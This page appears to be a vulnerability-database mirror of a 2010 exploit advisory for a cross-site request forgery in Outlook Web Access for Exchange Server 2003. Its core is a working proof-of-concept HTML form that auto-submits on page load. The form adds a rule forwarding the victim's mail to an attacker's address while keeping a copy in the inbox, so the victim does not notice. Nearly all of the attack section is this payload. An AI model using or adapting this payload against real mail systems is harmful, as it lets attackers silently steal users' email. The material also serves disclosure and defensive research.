Lucene search
K

Outlook Web Access 2003 Cross Site Request Forgery

🗓️ 21 Jul 2010 00:00:00Reported by anonymousType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Outlook Web Access 2003 Cross Site Request Forgery vulnerability allows unauthorized rule additio

Code
`# Exploit Title: Microsoft Office Outlook Web Access for Exchange Server 2003 XSRF Vulnerability  
# Date: 07/20/2010  
# Author: anonymous  
# Tested on: Microsoft Office Outlook Web Access for Exchange Server 2003  
  
A cross-site request forgery vulnerability in Microsoft Office  
Outlook Web Access for Exchange Server 2003 can be exploited to add  
an automatic forwarding rule (as PoC) to the authenticated user's  
account.  
  
PoC:  
<form name="xsrf" action="http://exchange.victim.com/Exchange/victim_id" method="post" target="_self">  
<input type="hidden" name="cmd" value="saverule">  
<input type="hidden" name="rulename" value="evilrule">  
<input type="hidden" name="ruleaction" value="3">  
<input type="hidden" name="forwardtocount" value="1">  
<input type="hidden" name="forwardtoname" value="guy, bad">  
<input type="hidden" name="forwardtoemail" value="[email protected]">  
<input type="hidden" name="forwardtotype" value="SMTP">  
<input type="hidden" name="forwardtoentryid" value="">  
<input type="hidden" name="forwardtosearchkey" value="">  
<input type="hidden" name="forwardtoisdl" value="">  
<input type="hidden" name="keepcopy" value="1">  
<body onload="document.forms.xsrf.submit();">  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation